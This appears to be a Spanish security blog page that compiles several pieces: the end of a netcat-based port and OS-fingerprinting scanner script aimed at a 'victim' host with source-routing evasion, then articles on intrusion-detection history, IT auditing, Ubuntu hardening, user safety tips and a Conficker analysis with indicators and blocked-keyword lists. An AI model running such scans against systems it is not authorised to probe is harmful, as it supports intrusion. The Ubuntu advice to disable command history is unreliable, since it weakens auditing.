VICTIMA=$1
echo $MEM1
echo $MEM2 ${rojo}DoctorX${cl} $MEM22
echo $MEM3 $VICTIMA
echo $MEM6 ; }

# Mensaje 2

function mem_web() {
mem_web1=”Hackers Venezuela”
mem_web2=”By”
mem_web3=”Victima : “
VICTIMA=$1
mem_web4=”Determinacion de SO en Web Servers”
echo $mem_web1
echo $mem_web4
echo $mem_web2 ${rojo}DoctorX${cl} $email
echo $mem_web3 $VICTIMA ;}

# Scan Tcp

function tcp() {
HOST=$1
$NETCAT $HOST $PUERTOS ; }

# Scan Tcp con Rango

function tcp_rango() {
HOST=$2
RANGO=$1
$NETCAT $HOST $RANGO ; }

# Scan UDP

function udp() {
VICTIMA=$1
echo $MEM7
$NETCAT -u $VICTIMA $PUERTOS ; }

# Scan UDP con gateway

function udp_gateway() {
echo $MEM7
VICTIMA=$2
GATE=$1
NETCAT_GATE=”nc -v -v -z -u $VICTIMA -g $GATE “
$NETCAT_GATE $PUERTOS ; }

# Scan con Source Routing

function tcp_gateway() {
GATE=$1
HOST=$2
RANGO=$PUERTOS
echo “Gate : $GATE “
$NETCAT -g $GATE $HOST $RANGO ; }

# Advertencia

function adv() {
local MEM4=”Falta el GateWay para el Source Routing !!!!!!”
local MEM5=”Te van a pillar !!!!!!! $USER jejejejeje “
echo ${rojo}$MEM4${cl}
echo ${re}${rojo}$MEM5${cl} ; }

# Determinacion de SO

function web_so() {
NC=”nc -w “
HTTPPORT=”80″
GET=”GET /”
ECHO=”/bin/echo”
HEAD=”HEAD / HTPP/1.0″
HTTPVARIABLE=”Server:”
WEB_SERVER=”$1″
LOG=”salida.txt”
#CHECKHTTP=( echo $GET ; sleep 5)| $NETCAT $VICTIMA 80
( echo $HEAD ; echo ; echo ) | $NC 8 $WEB_SERVER $HTTPPORT | grep $HTTPVARIABLE | cut -d: -f2 1> $LOG
cat $LOG
rm -f $LOG ;}

# Seleccion de Opcion

case $# in 0 ) mem ;;
1 ) mem2 $1 ;
adv ;
tcp $1 ;;
3 ) if [ "$1" != "r" ]; then
mem2 $2
udp_gateway $3 $2
else { mem2 $3
adv
tcp_rango $2 $3 ;}
fi ;;
2 ) if [ "$1" != "u" ] ; then
if [ "$1" != "so" ] ; then
{ mem2 $1
# adv
tcp_gateway $2 $1 ;}
else { mem_web $2
web_so $2 ;}
fi
else { export HOST=$2
mem2 $HOST
udp $2
exit 0 ;}
fi ;
esac

<——- Fin del Hven-Scanner, cortar aquí ———>

Conclusión:
============

Si estudiamos detalladamente las variables, el misterio de netcat desaparece, viene la parte de la imaginación; ¿Que otras funciones le podemos asignar? ¿Que mas podría hacer? ; al revisar el
programa que envió Dr._X me dije: “Lógico! Hmmm… Y que tal si hacemos asi…” ; el hacking no es más que probar nuevas posibilidades, utilizando el ingenio, los conocimientos acumulados y una dosis bastante fuerte de imaginación podremos lograr loque queramos.

Si tienes otras ideas, utilidades, programas o forma innovadora para utilizar netcat, escribenos un mail, estaré encantado de anexarlo en este documento….

Este Documento fue Realizado por Kliber, Agradecimientos especiales a Doctor_X (Code Freak) , DarkDeath, y a todos los miembros de nuestra comunidad por su invaluable Colaboración.

“Hecho en Venezuela!”

==============================
kliber@hven.com.ve
Hackers Venezuela
“El Conicimiento es Poder!!”
http://hven.com.ve
==============================

Fuente Externa: foro.elhacker.net/

Historia

Cuando la gente oye hablar de Sistemas de Detección de Intrusiones, generalmente los asocia a “alarmas de ladrones para ordenadores o redes”. Es fácil entender un concepto como este usando comparaciones sencillas. En realidad, la explicación es bastante aproximada, y los usuarios que no se dedican a la seguridad no necesitan saber más. Sin embargo, los expertos en seguridad no pueden cometer el error de conformarse con algo tan trivial, sin tener conocimiento alguno sobre la historia de estos sistemas.

La detección de intrusiones es el fruto de la aplicación del Procesamiento Electrónico de Datos (EDP) a las auditorías de seguridad, utilizando mecanismos de identificación de patrones y métodos estadísticos. Es una parte imprescindible en las modernas tecnologías de seguridad de redes.

Antes de la detección de intrusiones existían las auditorías de seguridad. La auditoría es el proceso de generar, almacenar y revisar eventos de un sistema cronológicamente.

La Figura 1‑1 muestra un esquema simple del funcionamiento de un sistema de auditorías. Los eventos de sistema son capturados por los generadores de auditorías, que llevan los datos al elemento encargado de guardarlos en un fichero de “logs”. El analizador, en base a unas políticas de seguridad, emite los resultados a través de un terminal.

Figura 1‑1 – Sistema de Auditorías Básico

Durante los comienzos de la historia de los ordenadores, estas máquinas eran relativamente escasas y muy caras. Su uso estaba restringido a técnicos e ingenieros especializados. Los primeros sistemas de auditorías tenían como propósito medir el tiempo que dedicaban los operadores a usar los sistemas que monitorizaban, con una precisión de milésimas de segundo, y servían entre otras cosas para poder facturarles el mismo.

Auditorías: el comienzo

A mediados de los años 50 la empresa “Bell Telephone System”, de Estados Unidos, creó un grupo de desarrollo con el objetivo de analizar el uso de los ordenadores en el futuro en el negocio de las empresas de telefonía. Este equipo estableció la necesidad de utilizar auditorías mediante el Procesamiento Electrónico de Datos (EDP), rompiendo con el anterior sistema basado en los tradicionales informes de papel. Esto hizo que a finales de los 50 la “Bell Telephone System” se embarcara en el primer sistema a gran escala de facturación telefónica controlada por ordenadores. [1]

El Departamento de Defensa de EEUU empleó numerosos recursos en los años 70 para la investigación de políticas de seguridad, directrices y pautas de control de lo que denominaban “sistemas de confianza”. Estos esfuerzos culminaron con la Iniciativa de Seguridad de 1977.

Los Sistemas de Confianza son aquellos “sistemas que emplean los suficientes recursos hardware y software para permitir el procesamiento simultáneo de una variedad de información confidencial o clasificada”. [2]

En estos sistemas se albergaban distintos tipos de información repartida en niveles, que correspondían a su grado de confidencialidad.

En un principio, los desarrolladores no tenían claro si las auditorías jugaban un papel importante en la seguridad de un sistema de confianza. Más tarde, se terminó incluyendo un apartado sobre los mecanismos de las auditorías en el “Trusted Computer System Evaluation Criteria” o TSCSEC [3] (Libro Naranja), como un requisito para cualquier sistema de confianza de clase C2 o superior. La serie de documentos del Departamento de Defensa de EEUU sobre Sistemas de Confianza se conoce como la “serie Arco Iris” (“Rainbow series”) debido a los colores de las tapas de los libros que publicaban.

El documento que trata el tema de las auditorías está incluido en el “Libro Marrón” titulado “A Guide to Understanding Audit in Trusted Systems” [4]. En este libro se enumeran los cinco objetivos de un mecanismo de auditoría:

·         Permitir la revisión de patrones de acceso (por parte de un objeto o por parte de un usuario) y el uso de mecanismos de protección del sistema.

·         Permitir el descubrimiento tanto de intentos internos como externos de burlar los mecanismos de protección.

·         Permitir el descubrimiento de la transición de usuario cuando pasa de un menor nivel de privilegios a otro mayor (elevación de privilegios).

·         Permitir el bloqueo de los intentos de los usuarios por saltarse los mecanismos de protección del sistema.

·         Servir además como una garantía frente a los usuarios de que toda la información que se recoja sobre ataques e intrusiones será suficiente para controlar los posibles daños ocasionados en el sistema.

Los primeros Sistemas de Detección de Intrusiones

A medida que el número de ordenadores crecía, el número de eventos de sistema a analizar era tal que esta tarea se volvía humanamente imposible. Las autoridades militares de norteamericanas se dieron cuenta de que el uso cada vez más masivo de ordenadores en sus instalaciones requería algún mecanismo que facilitara la labor de los auditores.

James P. Anderson fue la primera persona capaz de documentar la necesidad de un mecanismo que automatizara la revisión de los eventos de seguridad. Describió el concepto de “Monitor de Referencias” en un estudio encargado por las Fuerzas Aéreas de EEUU, y redactó un informe en 1980 que sería el primero de los futuros trabajos sobre detección de intrusiones. Uno de los objetivos de este informe era la eliminación de información redundante o irrelevante en los registros de sucesos.

Anderson propuso un sistema de clasificación que distinguía entre ataques internos y externos, basado en si los usuarios tenían permiso de acceso o no al ordenador. Estos eran los principales objetivos de los mecanismos de auditoría de seguridad:

Leer más…

(Editado por Fernando Ortega: Juan Pecantet nos envía este artículo sobre auditorías de seguridad. No nos indica ninguna referencia sobre la procedencia del artículo, pero por el interesante contenido, lo publicamos)

La información es el activo mas importante para las empresas, lo cual se puede confirmar si consideramos el hecho de la perdida de información critica, y la post recuperación con la cual la entidad podría retomar sus operaciones normales en un menor tiempo, que si ocurre lo contrario. Por este motivo la información adquiere una gran importancia para la empresa moderna debido a su poder estratétigo y a que se invierten grandes cantidades de dinero en tiempo de proporcionar un buen sistema de información para tener una mayor productividad

La importancia en que radica auditoria de sistemas en las organizaciones son:

- Se puede difundir y utilizar resultados o información errónea si los datos son inexactos o los mismos son manipulados, lo cual abre la posibilidad de que afecte seriamente las operaciones, tomas de decisiones o la imagen de la empresa.

- Las computa, servidores y centros de base de datos se han convertido en blanco para fraudes, espionaje, delincuencia y terrorismo informático.

- La continuidad de las operación, administración y organización de la empresa no debe permanecer en un sistema mal diseñado, ya que podría convenirse en un serio peligro para la empresa.

- Existen grandes posibilidades de robo de secretos comerciales, información financiera, administrativa, la transferencia ilícita de tecnología y demás delitos informáticos.

- Mala imagen e insatisfacción de los usuarios  porque no reciben el soporte técnico adecuado o no se reparan los daños de hardware ni se resuelven los problemas en un lapso razonable, es decir, el usuario percibirá que está abandonado y desatendido permanentemente, esto dará una mala imagen de la organización.

- En el Departamento de Sistemas se observa un incremento de costos, inversiones injustificadas o desviaciones presupuestarias significativas.

- Evaluación de nivel de riesgos en lo que respecta a seguridad lógica, seguridad física y confidencialidad.

- Mantener la continuidad del servicio, la elaboración y la actualización de los planes de contingencia para lograr este objetivo.

- El inadecuado uso de la computadora para usos ajenos a la organización que puede llegar a producir problemas de infiltración, borrado de información y un mal rendimiento.

- Las comunicaciones es el principal medio de negocio de las organizaciones, una débil administración y seguridad podría lograr una mala imagen, retraso de negocios, falta de confianza para los clientes y una mala expectativa para la producción.

La Auditoria de la Seguridad Informática en la informática abarca el concepto de seguridad física y lógica. La seguridad física se refiere a la protección de hardware y los soportes de datos, así también como la seguridad del los edificios y las instalaciones que lo albergan. Esto mismo contempla situaciones de incendios, inundaciones, sabotajes, robos, catástrofes naturales, etc.

Por su parte la seguridad lógica se refiere a la seguridad del uso de software, protección de la información, procesos y programas, así como el acceso ordenado y autorizado de los usuarios a la información.

El auditar la seguridad de los sistemas, también implica que se debe tener cuidado que no existan copias piratas, o bien que, al conectarnos en red con otras computadoras, no exista la posibilidad de transmisión de virus.

En la auditoria para aplicaciones de internet se produce una verificación de los siguientes aspectos:

- Evaluación de los riesgos de Internet (operativos, tecnológicos y financieros) y así como su probabilidad de ocurrencia.

- Evaluación de vulnerabilidades y arquitectura de seguridad implementada.

- Verificar la confidencialidad e integridad de las aplicaciones y la publicidad negativa como consecuencia de ataques exitosos por parte de hackers.

Metodología de trabajo de Auditoria

El método del auditor pasa por las siguientes etapas:

- Alcances y Objetivos de la Auditoria Informática.

- Estudio inicial del entorno auditable.

- Determinación de los recursos necesarios para realizar la auditoria.

- Elaboración de Plan y de los Programas de trabajo.

- Actividades propiamente dichas de la auditoria.

- Confección y elaboración del informe final.

Como he dicho antes las comunicaciones son la base de los negocios modernos, pues sin las mismas ninguna empresa podría sobrevivir. Para esta razón, es necesario que las organizaciones mantengan a sus servidores, datos e instalaciones lejos de los hackers y piratas informáticos.

La privacidad de las redes es un factor muy importante ya que las empresas se sienten amenazadas por el crimen informático. El mantener una red segura fortalece la confianza entre los clientes de la organización y mejora su imagen corporativa, ya que muchos son los criminales informáticos que acechan día a día.

Por lo cual el auditor o consultor informático ayuda a mantener la privacidad de las redes, trabajando en los siguientes factores: Disponibilidad – Autentificación – Integridad – Confidencialidad

Es preciso tener en cuenta todos los factores que puedan amenazar la privacidad y no solamente los intencionados. Desde el punto de vista de los usuarios, los peligros derivados de los incidentes del entorno o de errores humanos que alteren la red pueden ser tan costosos como los ataques intencionados. La seguridad de las redes y la información puede entenderse como la capacidad de las redes o de los sistemas de información para resistir, con un determinado nivel de confianza, todos los accidentes o acciones malintencionadas, que pongan en peligro la disponibilidad, autenticidad, integridad y confidencialidad de los datos almacenados o transmitidos y de los correspondientes servicios que dichas redes y sistemas ofrecen o hacen accesibles.

Las principales amenazas o riesgos que enfrentan las empresas que utilizan las redes son:

- Interceptación de las comunicaciones.

- Acceso no autorizado a ordenadores o Redes de ordenadores

- Perturbación de las redes.

- Ejecución de programas que modifiquen o dañen los datos.

- Declaración falsa.

- Accidentes no provocados.

- Robo de datos.

- Infiltración de datos críticos.

Los beneficios de un sistema de seguridad son:

- Aumento de la productividad

- Aumento de la motivación del personal

- Compromiso con la misión de la compañía

- Mejoras de las relaciones laborales

- Mejoras del rendimiento

- Mayor profesionalismo

- Ayuda a formar equipos competentes

- Mejora los climas laborares de los RR.HH

Desarrollar un sistema de seguridad significa “planear, organizar, coordinar dirigir y controlar las actividades relacionadas a mantener y garantizar la integridad física de los recursos implicados en la función informática, así como el resguardo de los activos de la empresa”.

Etapas para implementar un sistema de seguridad

- Introducir el tema de seguridad en la visión de la empresa.

- Definir los procesos de flujo de la información y sus riesgos en cuento a todos los recursos participantes.

- Capacitar a los gerentes y directivos, contemplando el enfoque global.

- Designar y capacitar supervisores de área.

- Definir y trabajar sobre todo las áreas donde se pueden lograr mejoras en menor tiempo.

- Mejorar las comunicaciones internas

- Identificar claramente las áreas de mayor riesgo corporativo y trabajar con ellas planteando soluciones de alto nivel

- Capacitar a todos los trabajadores en los elementos de seguridad básica, riesgo de manejo de software y seguridad física.

Fuente: http://www.shellsec.net/articulo/auditoria-empresas/

Linux en un sistema operativo muy seguro. Pero si dejamos una instalación sin configurar algunos detalles, esa seguridad puede verse comprometida.La seguridad en Ubuntu Linux es algo que no podemos dejar de lado. Aquí voy a dejar algunas cuestiones básicas que muchas veces pasamos por alto y dejan vulnerable nuestro sistema operativo.

1 – Debemos asegurarnos que el disco rígido este seleccionado en primer lugar en la secuencia de arranque de nuestra PC. Con esto evitamos:

* que alguien utilice un CD de instalación de Linux para tener acceso como root
* que usen un Live CD que permita ver, compartir y/o destruir nuestro disco rígido completo
* que alguien instale otro sistema operativo sobre nuestro Ubuntu Linux

2 – Debemos establecer una contraseña para la BIOS de nuestra PC. Esto impide que un desconocido cambie la secuencia de arranque de la PC.

3 – La PC debe estar en un lugar seguro. Cualquiera que tenga acceso físico a la PC puede retirar la batería de la placa y volver a ponerla, reseteando la contraseña de la BIOS.

4 – Asegurarnos que la contraseña de nuestro sistema operativo Linux Ubuntu no es fácil de averiguar. Nuestra contraseña debe tener como mínimo 8 caracteres para ser segura. La mejor contraseña es la que combina caracteres numéricos y alfanuméricos con mayúsculas y minúsculas.

5 – Debemos asegurarnos que el historial de los comandos de la consola de Ubuntu Linux esta desactivado. Aunque a veces es más fácil encontrar un comando que usamos mucho en el historial, esto puede provocar que alguien vea cuales fueron nuestras últimas acciones en Linux y deliberadamente arruinar nuestro trabajo. Por otro lado, tener que escribir los comandos una y otra vez nos permite aprender “por la fuerza” los comandos del sistema operativo Linux Ubuntu.

6 – Desactivar la combinación de teclas Ctrl + Alt + Del en modo consola. Esto impide que alguien pueda reiniciar Linux sin permiso.

7 – Asegurarnos que el modo interactivo para mover, copiar y eliminar archivos esta activo en el modo consola. Esto impide que la inexperiencia con el sistema operativo Linux nos lleve a cometer errores en el manejo de archivos.

8 – Para el trabajo cotidiano conviene hacer login como usuario normal. Si ingresamos como root podemos accidentalmente borrar o modificar archivos del sistema, y no siempre sabemos como arreglar este tipo de situaciones en Linux.

9 – Siempre es conveniente ejecutar las tareas administrativas usando el comando “sudo”. En Linux usar el comando “sudo” nos permite auditar nuestras acciones y corregirlas si fuera necesario. Lo que hacemos con el comando “sudo” queda registrado en /var/log/auth.log. Podemos revisar este archivo para ver cuales fueron nuestras últimas acciones y descubrir cual de ellas provoco el problema para luego corregirlo.

10 – Ubuntu Linux es un sistema operativo muy seguro. Pero aun así es conveniente instalar un cortafuegos como Firestarter. Un cortafuegos no garantiza la seguridad de nuestro sistema operativo, pero es nuestra primera defensa ante un ataque proveniente de la red.

fuente: dragonjar.org

Consejos basicos de Seguridad

- Tener un antivirus actualizado y FUNCIONANDO cada vez que tengamos encendido el PC. En teoria, no hay razon alguna para desactivar un antivirus. El antivirus no solo os evita los “virus y troyanos” (ojo, es lo mas importante), sino tambien los codigos maliciosos que pueda haber en una web, en un correo, en una cookie, etc etc etc

- Tener un firewall instalado, que os evitara la colocacion de dialers, atakes netbios, mensajes por el mensajero de windows, evitara que saken informacion de vuestro PC, incluso que averiguen vuestra IP, etc etc. Es muy importante CONFIGURAR el firewall, porque si lo que kieres es que te proteja de los ataques Netbios (pero tienes una LAN y kieres usar los recursos compartidos), tienes que denegar el trafico Netbios a traves de TCP/IP. El firewall tambien evitara en lo posible las conexiones de los troyanos, en la medida de lo posible, asi como protegera de los intentos de DoS y nukeos a la makina. Es casi imprescindible.

- Tener vuestro gestor de correo configurado para que leas los mails POR DEFECTO en formato texto plano (NO EN HTML). Asi evitas TODOS los codigos maliciosos VBs y JS, asi como los tipicos “xploits” de hotmail.

- Jamas, JAMAS, mandes ningun tipo de informacion confidencial por correo, incluyendo tu password, tu numero de tarjeta de credito, etc etc….Hotmail y los demas servicios de correo JAMAS te pediran tu password a traves de un mail. Lo mismo con los demas servicios a traves de internet (paginas webs, compras online, etc etc)

- Usa contraseñas robustas, es decir, que sean de 8 caracteres o mas (mi clave de este foro tiene mas de 20 caracteres, por ejemplo…), que combinen letras y numeros y que no tengan nada que ver contigo. Y por supuesto, no uses una contraseña “general” para todo, pues si la descubren, tendran acceso a todos tus datos y demas. Usa contraseñas distintas para servicios distintos.

- Es muy recomendable el uso de algoritmos de cifrado para proteger tus comunicaciones. Tanto el SSH en tus accesos a servidores (telnet y rlogin son muy propensos al snifado de contraseñas), como el uso del PGP – GnuPG en tus mails. El uso de este cifrado en tus mails, no es solo para evitar que “El Gran Hermano” te lea los mails, sino para autentificar al destinatario que ERES TU REALMENTE el que ha enviado ese mail.

- Si accedes a servicios a traves de PCs publicos (como por ejemplo, leer tu correo Hotmail en un cyber) aplica, si el servicio lo permite, la politica de seguridad de “equipo publico o compartido” (Hotmail lo permite por ejemplo). Esto lo que hace es que la cookie no se guarda en dixo PC. Es muy usual irte a un ciber, oficina, universidad, etc etc… entrar en hotmail y verte “conectado” con la cuenta de otro. Otra medida de seguridad, para evitar esto, es CERRAR la sesion una vez terminadas las operaciones que ibas a realizar. Por ejemplo, si yo me metiera en este foro en un ciber que no dispone de politicas de seguridad de ekipos publicos y NO CIERRO la sesion al irme de mi puesto, un usuario del cyber, al conectarse a este foro, accederia con mi cuenta. Por eso es tan importante el cierre de sesion en ekipos publicos.

- No abras-ejecutes archivos enviados por mail / msn / irc / chat, etc etc de personas desconocidas, sin pasarle antes un antivirus. Un colega, para hacer la gracia, me mando el tipico troyano por MSN. Menos mal que tenia el AV kaspersky puesto…

- Deniega las cookies de terceros, pues algunas continen codigo malicioso y herramientas de seguimiento (Spyware).

- Informate de los servicios que ejecuta tu PC normalmente, y comprueba dichos servicios si tu ordenador se comporta de manera extraña (puedes detectar un troyano, un spyware, etc etc en las tareas que el PC esta realizando –> Ctrl+Alt+Surp)

- Haz escaneos con el antivirus periodicamente de tu disco duro, pues es mas que posiblie que algun virus/troyano haya pasado la barrera y se haya instalado en tu disco duro.

- Manten tu equipo (sistemas operativos) y servicios (servidores web, ftp, p2p…) actualizados diariamente, que solo cuesta unos minutos al dia.

- No confies en personas extrañas que conozcas por MSN / IRC / etc.. de buenas a primeras, ni porque sean chicas (la de tontos que caen porque alguien se hace pasar por una chica y te kieren enviar la foto), ni porque se hagan los tontos (mira, este programa no me funciona, mira a ver si te funciona a ti… y es un troyano…), etc etc….

Fuente http://xanapsp.com/

Conficker es uno de los virus más dañinos de los últimos tiempos, un gusano que se apodera de tu PC, monta una especie de servidor web y empieza a atacar otros ordenadores de tu entorno.

Conficker, también conocido como Downadup, Downad y Kido.ih, se aprovecha de una vulnerabilidad en el servicio RPC de Windows, solucionada por Microsoft el pasado octubre mediante un parche especial. El ataque tiene lugar enviando una petición inicial al ordenador. En caso de ser vulnerable, se envía un archivo malicioso al ordenador de la víctima. Entonces, dicho archivo instala un servidor http y el ahora infectado PC envía otras peticiones de comprobación a otros equipos, y al igual que en el caso anterior, se procede al envío de nuevos archivos infectados en el caso de no tener cerrado el agujero de seguridad.

Además, Conficker se propaga en redes locales protegidas con contraseñas débiles y utiliza el mecanismo de autoarranque de dispositivos USB extraíbles, como discos duros, sticks, cámaras y similares. Esta combinación convierte a Conficker en el gusano más eficaz de los últimos doce meses, llegando a afectar a algunos de los 3.000 ordenadores del gobierno de Carintia, a numerosos hospitales en Austria e Inglaterra e incluso a partes de la marina francesa.

Al completar con éxito la infección, se descargan más archivos de malware desde diversos dominios, que instalan, entre otras cosas, scareware. Como el contacto con los servidores botnet no se pierde, Conflicker genera 250 nuevos nombres de dominio al día, basándose en la fecha.

La actual ola de infección sugiere que los creadores del gusano Conficker están preparando una nueva generación de botnets. En este momento, las máquinas infectadas parecen estar “listas para la batalla”, y posiblemente los cibercriminales darán pronto la señal de pasar al ataque, desencadenando una acción concertada con las botnets preparadas.

¿Cuántos ordenadores han sido infectados?

Las estimaciones varían enormemente y van desde unos pocos cientos de miles de equipos infectados hasta unos 10 millones. Es difícil hacer una estimación precisa. Muchos de los ordenadores infectados están conectados a varios servidores de control, por lo que pueden ser contados varias veces. Por otra parte, cientos de PCs infectados en redes corporativas pueden figurar de cara al exterior como un único equipo. Aún así, incluso siendo conservadores nos enfrentamos a una de las botnets de mayor capacidad.

¿Cómo protegerse?

El caso de Conficker demuestra en toda su crudeza la importancia de contar con un sistema de gestión de los parches. La existencia de un agujero de seguridad en el sistema operativo Windows, que Conficker busca constantemente y explota una vez da con él, es de dominio público desde octubre de 2008. Desde entonces, Microsoft ha ofrecido la actualización necesaria para solventar dicho agujero, pero por desgracia muchos responsables de red no han reaccionado a tiempo ni descargado y aplicado el parche disponible.

Un factor digno de mención, y todavía más decisivo, es la utilización de contraseñas adecuadas de red y de cuentas de usuario. Una contraseña sencilla como “12345” o “admin” no proporciona seguridad alguna, algo de lo que los creadores de Conficker se aprovechan sin problemas. Es más, en muchas empresas ni siquiera existen políticas de utilización de dispositivos extraíbles como los sticks USB, uno de los principales caminos para la difusión de Conficker. El mecanismo de autoarranque está activado en muchos ordenadores y no lo utiliza sólo Conficker para propagarse, sino también muchos otros programas de malware. Aun así, al desactivar la función de autoarranque se impide la facilidad de uso de CDs.

OpenDNS proporciona un servicio interesante al respecto: reconocen los PCs de una red que han sido infectados por Conficker y bloquea el acceso a los 250 nuevos dominios botnet que se crean cada día. De esta forma, los PCs zombie infectados no reciben instrucciones de quien pretende controlarlos de forma remota, por lo que permanecen inactivos.

¿Cómo saber si Conficker ha infectado un ordenador?

Una suite completa de protección antivirus con firmas de detección actualizadas es capaz de detectar Conficker. Cualquiera que no haya hecho sus deberes y haya dejado puertas traseras internas del sistema abiertas o que no haya aplicado los parches críticos tendrá que realizar un gran esfuerzo para desinfectar su ordenador.

Conficker utiliza secuencias aleatorias de caracteres como nombre de archivo, por lo que resulta difícil localizar la infección. Se registra como un servicio del sistema con nombres aleatorios y modifica el registro en los siguientes puntos:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\

Services\ [Random name for the service]

Image Path = „%System Root%\system32\svchost.exe -k netsvcs“

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\

Services\[Random name for the service]\Parameters

ServiceDll = „[Path and filename of the malware]“

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\

Windows NT\CurrentVersion\SvcHost

También puede detectarse al comprobar que determinados servicios relacionados con la seguridad ya no funcionan:

• Windows Security Center

• Windows AutoUpdate

• Windows Defender

• Error Reporting Service

Asimismo, se impide el acceso a sitios web con las siguientes secuencias de caracteres, entre los que se encuentran las webs de los fabricantes de antivirus más importantes (como G DATA) y portales de información sobre malware:

“virus”, “spyware”, “malware”, “rootkit”, “defender”, “microsoft”,

“symantec”, “norton”, “mcafee”, “trendmicro”, “sophos”, “panda”,

“etrust”, “networkassociates”, “computerassociates”, “f-secure”,

“kaspersky”, “jotti”, “f-prot”, “nod32″, “eset”, “grisoft”,

“drweb”, “centralcommand”, “ahnlab”, “esafe”, “avast”, “avira”,

“quickheal”, “comodo”, “clamav”, “ewido”, “fortinet”, “gdata”,

“hacksoft”, “hauri”, “ikarus”, “k7computing”, “norman”, “pctools”,

“prevx”, “rising”, “securecomputing”, “sunbelt”, “emsisoft”,

“arcabit”, “cpsecure”, “spamhaus”, “castle”wilderssecurity”, “windowsupdate”

Los administradores de red pueden saber cuáles son los ordenados infectados al incrementarse el tráfico en el puerto 445. Tras la infección, Conficker obtiene la dirección IP del ordenador infectado recurriendo a las siguientes páginas:

• http://checkip.dyndns.org

• http://getmyip.co.uk

• http://www.getmyip.org

En base a la fecha, se calculan distintas direcciones actualizadas a través de los siguientes dominios:

• ask.com

• baidu.com

• google.com

• msn.com

• www.w3.org

• yahoo.com

Los ordenadores que accedan a estos dominios pueden estar infectados.

Forma visual de como trabaja Conficker

¿Cómo deshacerse de Conficker?

A través de la siguiente dirección de Microsoft puede consultarse una completa guía para la desinfección manual de los sistemas afectados:

http://www.microsoft.com/security/portal/Entry.aspx?Name=Win32/Conficker.

Además si su computadora está infectada con el gusano Conficker, usted podría tener problemas para descargar ciertos productos de seguridad, como la Herramienta de Eliminación de Software Malintencionado o acceder a otros sitios web, como Microsoft Update. Si usted no pueden acceder a esas herramientas, intente usar el Examen de Seguridad de Windows Live Onecare. Si eso no funciona, lea los siguientes artículos de Ayuda y Soporte Técnico de Microsoft para computadores infectados.

Alerta de virus acerca del gusano Win32/Conficker.B

Implementación de la herramienta MSRT e un ambiente empresarial
Principio de la páginaPrincipio de la página

Como el programa malicioso posee una configuración compleja y ataca múltiples puntos del sistema de forma simultánea, la limpieza manual puede ser una lucha titánica. Por ello, recomendamos que los usuarios menos experimentados recurran a las rutinas de eliminación de su software antivirus o a la última versión de MSRT (“Malicious Software Removal Tool“):

http://www.microsoft.com/germany/technet/sicherheit/tools/msrt.mspx

Fuentes:

http://www.muycomputer.com/

http://www.microsoft.com/latam/protect/default.mspx